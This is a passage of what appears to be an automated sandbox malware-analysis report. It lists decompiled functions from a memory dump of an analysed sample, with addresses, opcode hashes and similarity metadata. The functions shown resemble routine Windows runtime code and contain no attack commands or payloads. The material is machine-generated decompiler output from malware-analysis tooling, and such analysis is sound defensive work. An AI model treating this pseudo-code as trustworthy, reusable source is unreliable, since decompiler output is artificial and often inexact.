                                                                              • Instruction ID: 9c5c66d6419c3e7e645496216310d2088049c6cbb28443ecc8e0350630d18e76
                                                                              • Opcode Fuzzy Hash: 6c7a3bdb3609d0ef8d76b6278cbb4b013b4bc820b5905173ffb26cf5f6f732d5
                                                                              • Instruction Fuzzy Hash: 930126729826119BC3379F1E9900E26FBE6FFC2B61B554169E9058B205CB30C800CBE0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0179002D Relevance: .1, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0179002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E01787D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E01787D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E01787D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E01787D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                              0x01790032
                                                                              0x01790037
                                                                              0x01790043
                                                                              0x017d4b3a
                                                                              0x01790049
                                                                              0x01790049
                                                                              0x01790049
                                                                              0x0179004e
                                                                              0x01790053
                                                                              0x017d4b48
                                                                              0x017d4b5a
                                                                              0x017d4b4a
                                                                              0x017d4b53
                                                                              0x017d4b53
                                                                              0x017d4b5f
                                                                              0x00000000
                                                                              0x017d4b61
                                                                              0x00000000
                                                                              0x017d4b61
                                                                              0x01790059
                                                                              0x01790059
                                                                              0x01790060
                                                                              0x017d4b6f
                                                                              0x017d4b6f
                                                                              0x01790069
                                                                              0x017d4b83
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d4b90
                                                                              0x017d4b9b
                                                                              0x017d4b9b
                                                                              0x017d4ba4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d4baa
                                                                              0x00000000
                                                                              0x0179006f
                                                                              0x0179006f
                                                                              0x00000000
                                                                              0x0179006f
                                                                              0x01790069

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                              • Instruction ID: a30b25bec61a67fe780e880693ece40e08fbf7e94eb58e59363e87a8d34e4b69
                                                                              • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                              • Instruction Fuzzy Hash: E911C832615685CFEB239B2CD948B35F7E9AF51754F1900E0ED16C7A92D738D841C760
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0177766D Relevance: .1, Instructions: 54COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E0177766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0179F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0179F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L01784620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                                              0x01777672
                                                                              0x0177767f
                                                                              0x01777689
                                                                              0x017776de
                                                                              0x017776de
                                                                              0x0177768b
                                                                              0x01777691
                                                                              0x01777693
                                                                              0x01777697
                                                                              0x00000000
                                                                              0x01777699
                                                                              0x017776a8
                                                                              0x00000000
                                                                              0x017776aa
                                                                              0x017776ad
                                                                              0x017776b1
                                                                              0x00000000
                                                                              0x017776b3
                                                                              0x017776b3
                                                                              0x017776b5
                                                                              0x017776ba
                                                                              0x017776bc
                                                                              0x017776bc
                                                                              0x017776c0
                                                                              0x00000000
                                                                              0x017776c2
                                                                              0x017776ce
                                                                              0x017776ce
                                                                              0x017776c0
                                                                              0x017776b1
                                                                              0x017776a8
                                                                              0x01777697
                                                                              0x017776d9

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                              • Instruction ID: b0c818b828b950957a4b11264ffa21a9379e2b5817ad77fc48003e30c126a51b
                                                                              • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                              • Instruction Fuzzy Hash: 7301AC32700119ABDF24DE5EDC89E5BFBADEB84760F240524BA09CB258DA30DD21C7A0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01769080 Relevance: .1, Instructions: 53COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 69%
                                                                              			E01769080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x18585ec;
				E01782280(_t48, 0x18585ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0177FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x185538c; // 0x771a6828
					if( *_t84 != 0x1855388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x183f6e8);
						E017BD0E8(0x18585ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E018388F5(_t80, _t85, 0x1855388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x18586c0; // 0x13007b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x18586b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E01782280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E018388F5(0x18585ec, _t85, 0x1855388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E017AAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x185b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x18584c0;
																			if(_t82 >=  *0x18584c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01839063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0176922A(_t99);
										_t64 = E01787D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01838B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x18586c0; // 0x13007b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x18586b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x18586bc;
													_t87 = 0x18586b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E01769240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x18586c4;
												_t87 = 0x18586c0;
												L27:
												E01799B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E017BD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1855388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x185538c = _t51;
						goto L6;
					}
				}
			}




















                                                                              0x01769082
                                                                              0x01769083
                                                                              0x01769084
                                                                              0x01769085
                                                                              0x01769087
                                                                              0x01769096
                                                                              0x01769098
                                                                              0x01769098
                                                                              0x0176909e
                                                                              0x017690a8
                                                                              0x017690e7
                                                                              0x017690e7
                                                                              0x017690aa
                                                                              0x017690b0
                                                                              0x017690b7
                                                                              0x017690bd
                                                                              0x017690dd
                                                                              0x017690e6
                                                                              0x017690bf
                                                                              0x017690bf
                                                                              0x017690c7
                                                                              0x017690cf
                                                                              0x017690f1
                                                                              0x017690f2
                                                                              0x017690f4
                                                                              0x017690f5
                                                                              0x017690f6
                                                                              0x017690f7
                                                                              0x017690f8
                                                                              0x017690f9
                                                                              0x017690fa
                                                                              0x017690fb
                                                                              0x017690fc
                                                                              0x017690fd
                                                                              0x017690fe
                                                                              0x017690ff
                                                                              0x01769100
                                                                              0x01769102
                                                                              0x01769107
                                                                              0x0176910c
                                                                              0x01769110
                                                                              0x01769113
                                                                              0x01769115
                                                                              0x01769136
                                                                              0x0176913f
                                                                              0x01769143
                                                                              0x017c37e4
                                                                              0x017c37e4
                                                                              0x01769117
                                                                              0x01769117
                                                                              0x0176911d
                                                                              0x00000000
                                                                              0x0176911f
                                                                              0x0176911f
                                                                              0x01769125
                                                                              0x00000000
                                                                              0x01769127
                                                                              0x0176912d
                                                                              0x01769130
                                                                              0x01769134
                                                                              0x01769158
                                                                              0x0176915d
                                                                              0x01769161
                                                                              0x01769168
                                                                              0x017c3715
                                                                              0x0176916e
                                                                              0x0176916e
                                                                              0x01769175
                                                                              0x01769177
                                                                              0x0176917e
                                                                              0x0176917f
                                                                              0x01769182
                                                                              0x01769182
                                                                              0x01769187
                                                                              0x01769187
                                                                              0x0176918a
                                                                              0x0176918d
                                                                              0x0176918f
                                                                              0x01769192
                                                                              0x01769195
                                                                              0x01769198
                                                                              0x01769198
                                                                              0x01769198
                                                                              0x0176919a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c371f
                                                                              0x017c3721
                                                                              0x017c3727
                                                                              0x017c372f
                                                                              0x017c3733
                                                                              0x017c3735
                                                                              0x017c3738
                                                                              0x017c373b
                                                                              0x017c373d
                                                                              0x017c3740
                                                                              0x00000000
                                                                              0x017c3746
                                                                              0x017c3746
                                                                              0x017c3749
                                                                              0x00000000
                                                                              0x017c374f
                                                                              0x017c374f
                                                                              0x017c3751
                                                                              0x017c3757
                                                                              0x017c3759
                                                                              0x017c375c
                                                                              0x017c375c
                                                                              0x017c375e
                                                                              0x017c375e
                                                                              0x017c3761
                                                                              0x017c3764
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c3766
                                                                              0x017c3768
                                                                              0x017c37a3
                                                                              0x017c37a3
                                                                              0x017c37a5
                                                                              0x017c37a7
                                                                              0x017c37ad
                                                                              0x017c37b0
                                                                              0x017c37b2
                                                                              0x017c37bc
                                                                              0x017c37c2
                                                                              0x017c37c2
                                                                              0x017c37b2
                                                                              0x01769187
                                                                              0x01769187
                                                                              0x0176918a
                                                                              0x0176918d
                                                                              0x0176918f
                                                                              0x01769192
                                                                              0x01769195
                                                                              0x00000000
                                                                              0x01769195
                                                                              0x00000000
                                                                              0x017c376a
                                                                              0x017c376a
                                                                              0x017c376a
                                                                              0x017c376c
                                                                              0x017c376c
                                                                              0x017c376f
                                                                              0x017c3775
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c3777
                                                                              0x017c3779
                                                                              0x017c3782
                                                                              0x017c3787
                                                                              0x017c3789
                                                                              0x017c3790
                                                                              0x017c3790
                                                                              0x017c378b
                                                                              0x017c378b
                                                                              0x017c378b
                                                                              0x017c3792
                                                                              0x017c3795
                                                                              0x00000000
                                                                              0x017c3795
                                                                              0x00000000
                                                                              0x017c3779
                                                                              0x017c3798
                                                                              0x00000000
                                                                              0x017c3798
                                                                              0x00000000
                                                                              0x017c3768
                                                                              0x017c379b
                                                                              0x017c379b
                                                                              0x017c3751
                                                                              0x017c3749
                                                                              0x00000000
                                                                              0x017c3740
                                                                              0x017691a0
                                                                              0x017691a3
                                                                              0x017691a9
                                                                              0x017691b0
                                                                              0x00000000
                                                                              0x017691b0
                                                                              0x01769187
                                                                              0x017691b4
                                                                              0x017691b4
                                                                              0x017691bb
                                                                              0x017691c0
                                                                              0x017691c5
                                                                              0x017691c7
                                                                              0x017c37da
                                                                              0x017691cd
                                                                              0x017691cd
                                                                              0x017691cd
                                                                              0x017691d2
                                                                              0x017691d5
                                                                              0x01769239
                                                                              0x01769239
                                                                              0x017691d7
                                                                              0x017691db
                                                                              0x017691e1
                                                                              0x017691e7
                                                                              0x017691fd
                                                                              0x01769203
                                                                              0x0176921e
                                                                              0x01769223
                                                                              0x00000000
                                                                              0x01769205
                                                                              0x01769205
                                                                              0x01769208
                                                                              0x0176920c
                                                                              0x01769214
                                                                              0x01769214
                                                                              0x0176920c
                                                                              0x017691e9
                                                                              0x017691e9
                                                                              0x017691ee
                                                                              0x017691f3
                                                                              0x017691f3
                                                                              0x017691f3
                                                                              0x017691e7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01769134
                                                                              0x01769125
                                                                              0x0176911d
                                                                              0x0176914e
                                                                              0x017690d1
                                                                              0x017690d1
                                                                              0x017690d3
                                                                              0x017690d6
                                                                              0x017690d8
                                                                              0x00000000
                                                                              0x017690d8
                                                                              0x017690cf

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 44781f0a7c71825f59070cdcaadb1e64c43b5bd44debe9b9d921d2202e12809b
                                                                              • Instruction ID: 73f9c50c3144f6a2861ec80a1d5e13ce223cc7a49cf27c3fdfc3f2e4d0ae8552
                                                                              • Opcode Fuzzy Hash: 44781f0a7c71825f59070cdcaadb1e64c43b5bd44debe9b9d921d2202e12809b
                                                                              • Instruction Fuzzy Hash: D601AF726026068FD3259F18D840B22FBADFB86329F254066EA05CB6A6C774DD41CFA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017FC450 Relevance: .1, Instructions: 53COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 46%
                                                                              			E017FC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E017A9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E017A95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E017A95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E017A95D0();
				return L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                              0x017fc458
                                                                              0x017fc45d
                                                                              0x017fc466
                                                                              0x017fc468
                                                                              0x017fc469
                                                                              0x017fc46a
                                                                              0x017fc46b
                                                                              0x017fc46e
                                                                              0x017fc46f
                                                                              0x017fc471
                                                                              0x017fc476
                                                                              0x017fc476
                                                                              0x017fc47c
                                                                              0x017fc47e
                                                                              0x017fc480
                                                                              0x017fc480
                                                                              0x017fc483
                                                                              0x017fc484
                                                                              0x017fc486
                                                                              0x017fc488
                                                                              0x017fc48f
                                                                              0x017fc491
                                                                              0x017fc493
                                                                              0x017fc493
                                                                              0x017fc48f
                                                                              0x017fc498
                                                                              0x017fc49e
                                                                              0x017fc4ad
                                                                              0x017fc4ad
                                                                              0x017fc4b2
                                                                              0x017fc4b4
                                                                              0x017fc4cd

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                              • Instruction ID: 86c6d4537ca5f557e869c718e07efe2f9edffe4878497111a67958e8612cc6af
                                                                              • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                              • Instruction Fuzzy Hash: 9A01967118050ABFE715AF69CC85E63FB6DFF94354F504529F354426A4C721ACA0C6A0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01834015 Relevance: .0, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 86%
                                                                              			E01834015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E01782280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E01782280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x18586ac);
					E0176F900(0x18586d4, _t28);
					E0177FFB0(0x18586ac, _t28, 0x18586ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0177FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                              0x0183401a
                                                                              0x0183401e
                                                                              0x01834023
                                                                              0x01834028
                                                                              0x01834029
                                                                              0x0183402b
                                                                              0x0183402f
                                                                              0x01834043
                                                                              0x01834046
                                                                              0x01834051
                                                                              0x01834057
                                                                              0x0183405f
                                                                              0x01834062
                                                                              0x01834067
                                                                              0x0183406f
                                                                              0x0183407c
                                                                              0x0183407c
                                                                              0x0183408c
                                                                              0x0183408c
                                                                              0x01834097

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 72402989c52fc6632662b1a823063d99a3d9927747c0bc43230b709387bad581
                                                                              • Instruction ID: 7ec1e7b306569689cbc774f3be61dc4e4df906f23775f8e0eee5f69b9638dc15
                                                                              • Opcode Fuzzy Hash: 72402989c52fc6632662b1a823063d99a3d9927747c0bc43230b709387bad581
                                                                              • Instruction Fuzzy Hash: 27017C72241A46BFD751BB79CE88E13F7ACEB96760B000229F518C7A11CB24ED11CAE4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0182138A Relevance: .0, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 61%
                                                                              			E0182138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x185d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E017AFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E01787D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E017AB640(E017A9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                              0x0182138a
                                                                              0x0182138a
                                                                              0x01821399
                                                                              0x018213a3
                                                                              0x018213a8
                                                                              0x018213aa
                                                                              0x018213b5
                                                                              0x018213bb
                                                                              0x018213c3
                                                                              0x018213c6
                                                                              0x018213c9
                                                                              0x018213d4
                                                                              0x018213e6
                                                                              0x018213d6
                                                                              0x018213df
                                                                              0x018213df
                                                                              0x018213f1
                                                                              0x018213f2
                                                                              0x018213f4
                                                                              0x018213f9
                                                                              0x0182140e

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d637434bba09fc6fff649030295eac1f5f78a22b28c9d00d03a575339bb84a7e
                                                                              • Instruction ID: 9a5e54f78c8985aae101d51c069a065775bc2894b35cb17bd08d3613d7f5d0ea
                                                                              • Opcode Fuzzy Hash: d637434bba09fc6fff649030295eac1f5f78a22b28c9d00d03a575339bb84a7e
                                                                              • Instruction Fuzzy Hash: 4C019271A00218AFCB14DFA8D849EAEBBB8EF44700F504156F900EB280D6749B40CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 018214FB Relevance: .0, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 61%
                                                                              			E018214FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x185d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E017AFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E01787D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E017AB640(E017A9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                              0x018214fb
                                                                              0x018214fb
                                                                              0x0182150a
                                                                              0x01821514
                                                                              0x01821519
                                                                              0x0182151b
                                                                              0x01821526
                                                                              0x0182152c
                                                                              0x01821534
                                                                              0x01821537
                                                                              0x0182153a
                                                                              0x01821545
                                                                              0x01821557
                                                                              0x01821547
                                                                              0x01821550
                                                                              0x01821550
                                                                              0x01821562
                                                                              0x01821563
                                                                              0x01821565
                                                                              0x0182156a
                                                                              0x0182157f

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fb9b6ba71aefb5b8c414aa096ea7d82048857fe16f50df3eca8ed8c820003ba7
